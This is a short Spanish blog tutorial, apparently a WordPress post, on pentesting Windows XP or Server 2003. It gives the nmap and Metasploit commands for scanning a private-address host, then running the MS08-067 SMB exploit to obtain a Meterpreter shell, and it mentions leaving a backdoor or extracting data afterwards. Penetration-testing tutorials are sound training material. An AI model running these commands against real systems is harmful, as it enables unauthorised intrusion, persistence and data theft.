Haciendo pentesting a Windows XP o Windows Server 2003

Dentro del amplio campo de los sistemas operativos tenemos muchas opciones entre ellas Linux y windows, sin embargo con el paso del tiempo aparecen nuevas actualizaciones de software, aunque muchas empresas o algunos hogares siguen utilizando software desactualizado como Windows XP.

Bien, vamos a empezar con el pentest realizando un simple escaneo con nmap

nmap -sV 192.168.1.33

Una vez determinado el host objetivo es recomendable usar un escaner de vulnerabilidades como Nessus 

Hemos descubierto que tiene un servicio para compartir archivos samba, sin embargo, vamos a buscar la versión especifica para ello utilizaremos el módulo de Metasploit

msfconsole

use auxiliary/scanner/smb/smb_version

set rhosts 192.168.1.33

exploit

 

 

Ahora que ya tenemos la existencia de fallos críticos y la versión de smb instalada en el sistema, así como la versión del sistema operativo, tenemos como vulnerabilidad el protocolo smb, por lo cual ahora solo tenemos que buscar un exploit para conseguir acceso.

use exploit/windows/smb/ms08_067_netapi
set rhost 192.168.1.33
exploit

Como veis ya tenemos el acceso y una shell de meterpreter para poder realizar el proceso de post explotación y dejar un backdoor, o extraer información.

 

@cyberh99

Anuncios

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión /  Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión /  Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión /  Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión /  Cambiar )

Conectando a %s